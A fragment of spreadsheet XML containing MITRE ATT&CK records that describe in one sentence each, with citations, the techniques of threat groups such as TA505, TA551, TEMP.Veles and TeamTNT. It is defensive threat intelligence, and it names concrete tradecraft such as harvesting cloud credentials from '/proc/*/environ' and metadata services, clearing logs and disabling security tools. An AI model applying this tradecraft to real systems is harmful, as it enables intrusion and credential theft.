    <t>[TA2541](https://attack.mitre.org/groups/G1018) has placed VBS files in the Startup folder and used Registry run keys to establish persistence for malicious payloads.(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--07efd7ec-332f-43fd-8ffc-6f50c32c4f55</t>
  </si>
  <si>
    <t xml:space="preserve">[TA2541](https://attack.mitre.org/groups/G1018) has used scheduled tasks to establish persistence for installed tools.(Citation: Proofpoint TA2541 February 2022) </t>
  </si>
  <si>
    <t>relationship--26487c38-877a-4f63-8877-b0fa1624fa71</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used tools to search victim systems for security products such as antivirus and firewall software.(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--25623cee-b8bc-4937-9a93-749549e69a83</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used a .NET packer to obfuscate malicious files.(Citation: Cisco Operation Layover September 2021)</t>
  </si>
  <si>
    <t>relationship--2909d2e7-ec59-4100-ad7a-f1197d419ae6</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has sent phishing emails with malicious attachments for initial access including MS Word documents.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)</t>
  </si>
  <si>
    <t>relationship--c8679afc-7e74-42aa-b009-baea6be724ef</t>
  </si>
  <si>
    <t xml:space="preserve">[TA2541](https://attack.mitre.org/groups/G1018) has used spearphishing e-mails with malicious links to deliver malware.  (Citation: Proofpoint TA2541 February 2022)(Citation: Telefonica Snip3 December 2021)
</t>
  </si>
  <si>
    <t>relationship--baa39a74-fd81-4e25-9e5e-a8b95147bdd5</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has collected system information prior to downloading malware on the targeted host.(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--2fa01aae-a201-4daa-b0e0-2e22af5788bb</t>
  </si>
  <si>
    <t xml:space="preserve">
[TA2541](https://attack.mitre.org/groups/G1018) has used commodity remote access tools.(Citation: Cisco Operation Layover September 2021)
</t>
  </si>
  <si>
    <t>relationship--54aae76b-14fe-47e9-86c8-bd39317429c3</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has uploaded malware to various platforms including Google Drive, Pastetext, Sharetext, and GitHub.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)</t>
  </si>
  <si>
    <t>relationship--03b02b8a-4f47-46ef-bdda-096c214ffcda</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</si>
  <si>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</si>
  <si>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relationship--b5cdabeb-0349-4d81-9a34-1d1348a846e4</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has hosted malicious files on various platforms including Google Drive, OneDrive, Discord, PasteText, ShareText, and GitHub.(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--e0ef0f63-9418-4258-8f0a-f752e4b4b1a0</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used WMI to query targeted systems for security products.(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--8f0ca79a-3768-46a2-b2c1-8aa638c6a8d2</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>relationship--8a9d92e5-e9b5-40bd-8cc4-c4cc5ed9fdd4</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>relationship--993e37d1-b81c-47d7-9063-216446271e07</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has used PowerShell for execution of a payload.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>relationship--c08f55ca-366b-4554-879b-1b19042f9be8</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has targeted victims using spearphishing emails with malicious Microsoft Word attachments.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>relationship--76021528-7cb6-461a-870a-f681cac19285</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has a VBScript for execution.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>relationship--927d8495-e288-4c7f-8033-0d7e85d66b10</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has signed payloads with code signing certificates from Thawte and Sectigo.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>relationship--badc4d79-2f59-4b9b-9044-9c53dcd386c0</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used base64 encoded PowerShell commands.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--a8b86839-9c18-465d-aa02-0f0b0132421b</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware to gather credentials from FTP clients and Outlook.(Citation: Proofpoint TA505 Sep 2017)</t>
  </si>
  <si>
    <t>relationship--580103be-ffce-4677-b24a-7092c1221ed0</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware to gather credentials from Internet Explorer.(Citation: Proofpoint TA505 Sep 2017)</t>
  </si>
  <si>
    <t>relationship--9e27c930-eba5-467f-90e5-4ec5b4219735</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used a wide variety of ransomware, such as [Clop](https://attack.mitre.org/software/S0611), Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.(Citation: Proofpoint TA505 Sep 2017)</t>
  </si>
  <si>
    <t>relationship--c99ee3c6-7d62-4514-bdac-4bf899ea0c16</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has decrypted packed DLLs with an XOR key.(Citation: NCC Group TA505)</t>
  </si>
  <si>
    <t>relationship--8bba06f3-fac2-4484-a177-53d5716f80a6</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware to disable Windows Defender.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--736a676f-7a27-4459-9dab-22d214a4db9e</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used stolen domain admin accounts to compromise additional hosts.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--b7a9afc1-3bbf-4eda-9709-5392156c1e41</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has registered domains to impersonate services such as Dropbox to distribute malware.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--0dcab59a-f989-4109-a667-d6b98898274b</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has leveraged malicious Word documents that abused DDE.(Citation: Proofpoint TA505 June 2018)</t>
  </si>
  <si>
    <t>relationship--f0e944fa-6dba-47c3-920a-cf7bad2d3bc5</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has been seen injecting a DLL into winword.exe.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--f1459bdf-06ae-435a-8506-1e8e444a410b</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>relationship--02c88228-8275-42a7-9c3a-d5393556bceb</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used fast flux to mask botnets by distributing payloads across multiple IPs.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>relationship--53356453-2cf1-46d9-ac8f-77fc3a2274d9</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has downloaded additional malware to execute on victim systems.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: ProofPoint SettingContent-ms July 2018)</t>
  </si>
  <si>
    <t>relationship--b3436a7d-81cf-4f79-9c74-e3b2370288d2</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used JavaScript for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)</t>
  </si>
  <si>
    <t>relationship--6f57b4eb-ba87-4755-9b96-3715e1da1de1</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</si>
  <si>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</si>
  <si>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relationship--49d6508c-f350-4376-ba32-f64693d7fd10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</si>
  <si>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</si>
  <si>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relationship--71ee0311-3fdc-4baf-8c3e-2143416b742c</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware such as [Azorult](https://attack.mitre.org/software/S0344) and [Cobalt Strike](https://attack.mitre.org/software/S0154) in their operations.(Citation: NCC Group TA505)</t>
  </si>
  <si>
    <t>relationship--b359d367-d52c-4835-b242-1073d8a55bc3</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used .iso files to deploy malicious .lnk files.(Citation: TrendMicro TA505 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--246e66e1-ddd2-4e51-b54c-1579f6ea1626</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used malware to disable Windows Defender through modification of the Registry.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--3debe0d7-63bb-4e21-bf9b-ed5e23140e57</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used &lt;code&gt;msiexec&lt;/code&gt; to download and execute malicious Windows Installer files.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>relationship--2f350d97-8492-4eb4-8640-2c3ae2bc8df1</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has deployed payloads that use Windows API calls on a compromised host.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--d7cfd2b5-c297-4000-b179-aca649a05f65</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has password-protected malicious Word documents.(Citation: Proofpoint TA505 Sep 2017)</t>
  </si>
  <si>
    <t>relationship--53e89989-29a6-461f-854c-42eb96b221b3</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used TinyMet to enumerate members of privileged groups.(Citation: IBM TA505 April 2020) [TA505](https://attack.mitre.org/groups/G0092) has also run &lt;code&gt;net group /domain&lt;/code&gt;.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>relationship--a9a39a39-b339-41d9-9790-198ac9352bfd</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</si>
  <si>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</si>
  <si>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relationship--ca484dbf-aa28-4d7e-90bb-b60723ff70b1</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has leveraged &lt;code&gt;rundll32.exe&lt;/code&gt; to execute malicious DLLs.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--841acdc1-42c3-4f7d-9840-c9e4057bc2ab</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used UPX to obscure malicious code.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--573f3932-8435-4b4a-b138-d9c955495197</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</si>
  <si>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</si>
  <si>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relationship--ce962c48-3390-4286-91bb-b38d7fb4f07a</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has sent spearphishing emails containing malicious links.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--e3f7935d-0f3a-440a-be19-ef9383914441</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</si>
  <si>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</si>
  <si>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relationship--3e6b6ed9-4c28-4dd0-903a-360f57864de4</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has staged malware on actor-controlled domains.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--75a91f69-93bc-40fd-a17c-ae675637c296</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used VBS for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Trend Micro TA505 June 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--5aaee352-e4b5-4d4c-b021-9f38adb346da</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has used HTTP to communicate with C2 nodes.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--f8e25c1f-84bd-4ddd-bf18-51543d5cff94</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) has executed commands using &lt;code&gt;cmd.exe&lt;/code&gt;.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>relationship--fee6aca0-dcb7-43b4-a253-66913620631a</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used obfuscated variable names in a JavaScript configuration file.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--9b222cfd-8b08-4843-8b08-32e2476aba36</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used a DGA to generate URLs from executed macros.(Citation: Unit 42 TA551 Jan 2021)(Citation: Secureworks GOLD CABIN)</t>
  </si>
  <si>
    <t>relationship--93656c66-acfc-43b4-af66-bf328256b7b8</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used spoofed company emails that were acquired from email clients on previously infected hosts to target other individuals.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>relationship--297ca26b-2074-46ea-b81d-a0a5c6fe5ac0</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has retrieved DLLs and installer binaries for malware execution from C2.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>relationship--c4953a3b-d674-4582-b644-1339ec097aad</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has prompted users to enable macros within spearphishing attachments to install malware.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>relationship--354551e4-c6aa-495a-aba5-b7437c485d34</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has masked malware DLLs as dat and jpg files.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>relationship--f2e075b3-1125-4259-bf0b-1ff90c738354</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used mshta.exe to execute malicious payloads.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>relationship--df33a65c-1529-4f8d-a27b-0d00f540e6e6</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used regsvr32.exe to load malicious DLLs.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--0af12d0f-ef9e-40e7-8b70-d811f412125d</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used rundll32.exe to load malicious DLLs.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>relationship--58565141-69f5-45c4-a7a9-f3eec03f403b</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has sent spearphishing attachments with password protected ZIP files.(Citation: Unit 42 Valak July 2020)(Citation: Unit 42 TA551 Jan 2021)(Citation: Secureworks GOLD CABIN)</t>
  </si>
  <si>
    <t>relationship--5d881746-44f9-4865-86de-97253fc197fb</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used encoded ASCII text for initial C2 communications.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--6a4eafba-a7fb-46d1-8c50-033e1e3d7409</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has hidden encoded data for malware DLLs in a PNG.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>relationship--59ef906c-f395-427a-9cd5-30887a983516</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used HTTP for C2 communications.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--c1349223-f356-4e0d-8148-bda128354347</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used &lt;code&gt;cmd.exe&lt;/code&gt; to execute commands.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>relationship--e52a9525-9209-4cf5-8f8e-43057ef6c2b3</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used a VPN to persist in the victim environment.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--3bd260ad-fca9-46c3-9144-51f24a917310</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) routinely deleted tools, logs, and other files after they were finished with them.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--d705cc12-1d6c-414d-8b39-1c099dec07ab</t>
  </si>
  <si>
    <t xml:space="preserve">[TEMP.Veles](https://attack.mitre.org/groups/G0088) has modified and added entries within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt; to maintain persistence.(Citation: FireEye TRITON 2019)	
</t>
  </si>
  <si>
    <t>relationship--173ba3ee-3bec-4849-b6a2-94ee5bce5f8e</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates.(Citation: FireEye TEMP.Veles 2018)</t>
  </si>
  <si>
    <t>relationship--60d2b385-14cf-454a-ac92-0d41e3ec397a</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used [Mimikatz](https://attack.mitre.org/software/S0002) and a custom tool, SecHack, to harvest credentials. (Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--f2dc80a5-b616-464c-94cd-6d52395f79fe</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has created staging folders in directories that were infrequently used by legitimate users or processes.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--28d58aa4-48ee-41c7-aefa-8e4402ddad3c</t>
  </si>
  <si>
    <t xml:space="preserve">[TEMP.Veles](https://attack.mitre.org/groups/G0088) has renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.(Citation: FireEye TRITON 2019)
</t>
  </si>
  <si>
    <t>relationship--b9ca1199-cb71-4435-84ec-75aee916d1ae</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--76ff48d5-a341-431b-8653-1b1ad93ae435</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used a publicly-available PowerShell-based tool, WMImplant.(Citation: FireEye TEMP.Veles 2018) The group has also used PowerShell to perform [Timestomp](https://attack.mitre.org/techniques/T1070/006)ing.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--a692f6c3-9082-4336-b52a-2a40556ee03d</t>
  </si>
  <si>
    <t xml:space="preserve">[TEMP.Veles](https://attack.mitre.org/groups/G0088) utilized RDP throughout an operation.(Citation: FireEye TRITON 2019)	</t>
  </si>
  <si>
    <t>relationship--76f7e81a-4637-4e02-b417-af4d85369432</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--857e24ad-248e-4068-b142-4421bc9254c4</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used scheduled task XML triggers.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--a8c82128-fcd4-49b2-8429-39a2b6db8c70</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) used timestomping to modify the $STANDARD_INFORMATION attribute on tools.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--cafe602e-c163-451c-8d61-69907e59968c</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [PsExec](https://attack.mitre.org/software/S0029).(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--e215f890-b524-4456-a104-64ac8abda389</t>
  </si>
  <si>
    <t xml:space="preserve">[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used compromised VPN accounts.(Citation: FireEye TRITON 2019)	</t>
  </si>
  <si>
    <t>relationship--cf506331-5caf-44a2-8020-34bbefda43eb</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used Virtual Private Server (VPS) infrastructure.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--c024f146-ef3e-4220-8658-b5ad312e1df1</t>
  </si>
  <si>
    <t>04 October 2020</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has planted Web shells on Outlook Exchange servers.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--6b1cf025-d38b-4cf4-9595-e6799e522c5b</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used an IRC bot for C2 communications.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>relationship--d0e68e5d-66a1-4f7d-ace6-8ad5d028fa20</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has cleared command history with &lt;code&gt;history -c&lt;/code&gt;.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--52068869-8ef9-4c84-913c-0c171ba9c30f</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has removed system logs from &lt;code&gt;/var/log/syslog&lt;/code&gt;.(Citation: Aqua TeamTNT August 2020)</t>
  </si>
  <si>
    <t>relationship--8453fdfe-a4b8-4f99-86e1-4110e8d24440</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has leveraged AWS CLI to enumerate cloud environments with compromised credentials.(Citation: Talos TeamTNT)</t>
  </si>
  <si>
    <t>relationship--da4059ab-c858-4df1-94e0-25db2d6ea136</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has queried the AWS instance metadata service for credentials.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--51551fb5-48df-4143-9163-9b7ffe35bf8f</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) executed [Hildegard](https://attack.mitre.org/software/S0601) through the kubelet API run command and by executing commands on running containers.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--12ea5ead-f19a-488e-8b47-ceb9d45593fd</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</si>
  <si>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</si>
  <si>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relationship--40383884-c607-48ac-9522-b5b1c8e256a9</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for unsecured AWS credentials and Docker API credentials.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--e830611d-a7c5-446c-a5a7-ec1062bb3f53</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used a script that decodes a Base64-encoded version of WeaveWorks Scope.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--9a74aca4-4a5e-4a12-bd98-6a4d2df1b1a1</t>
  </si>
  <si>
    <t>10 August 2022</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</si>
  <si>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</si>
  <si>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relationship--3e62e520-0104-4be7-b4e2-d68fa88d7067</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has disabled &lt;code&gt;iptables&lt;/code&gt;.(Citation: Aqua TeamTNT August 2020)</t>
  </si>
  <si>
    <t>relationship--321e9302-b335-4f17-b03a-7782683d69f9</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--6cc2d341-99a4-4d9a-895d-63f766fe79b9</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has obtained domains to host their payloads.(Citation: Palo Alto Black-T October 2020)</t>
  </si>
  <si>
    <t>relationship--d9e61755-27f6-4a94-a6f7-22cb150546ca</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has deployed privileged containers that mount the filesystem of victim machine.(Citation: Intezer TeamTNT September 2020)(Citation: Aqua TeamTNT August 2020)</t>
  </si>
  <si>
    <t>relationship--6f5b07b1-6848-48ce-9a33-f5418e2195be</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has sent locally staged files with collected credentials to C2 servers using cURL.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--4e73a249-94d5-4a52-9da4-a89da10d1c30</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</si>
  <si>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</si>
  <si>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relationship--01bebfd2-6c8c-4671-8754-34ca03c44299</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</si>
  <si>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</si>
  <si>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relationship--0b46eb26-ebc0-4fa7-8925-9b775571f793</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used a script that checks `/proc/*/environ` for environment variables related to AWS.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--90cb412d-399d-4009-8aa0-63f411eb34ff</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has the &lt;code&gt;curl&lt;/code&gt; and &lt;code&gt;wget&lt;/code&gt; commands as well as batch scripts to download new tools.(Citation: Intezer TeamTNT September 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--8bb0a7b0-a032-4278-abae-5730f574ff00</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has modified the permissions on binaries with &lt;code&gt;chattr&lt;/code&gt;.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--08c69567-a511-4a07-ab5d-a5bf77594129</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has created local privileged users on victim machines.(Citation: Intezer TeamTNT September 2020)</t>
  </si>
  <si>
    <t>relationship--25e9205c-3f27-4f93-81ea-b4bc1e3325ac</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has aggregated collected credentials in text files before exfiltrating.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--52ae918a-8afe-4e67-801f-d4fabbecef77</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has relied on users to download and execute malicious Docker images.(Citation: Lacework TeamTNT May 2021)</t>
  </si>
  <si>
    <t>relationship--6674eb2b-8295-4af4-b4d2-0659c15d3c71</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has developed custom malware such as [Hildegard](https://attack.mitre.org/software/S0601).(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--f2f8d56c-4a10-4be4-884d-7982931bd303</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has disguised their scripts with docker-related file names.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--970e9eb2-51d7-4986-9480-d8a3b59c3006</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--069f77c1-aafd-4883-aecd-707802442427</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</si>
  <si>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</si>
  <si>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relationship--b84414c0-18e9-4483-83db-555bd2880740</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has encrypted its binaries via AES and encoded files using Base64.(Citation: Trend Micro TeamTNT)(Citation: Aqua TeamTNT August 2020)</t>
  </si>
  <si>
    <t>relationship--a68a4d37-e2dd-4981-893d-20c43d056539</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for attached VGA devices using lspci.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--be8f7d93-1de8-4376-bec9-4db0a15f7542</t>
  </si>
  <si>
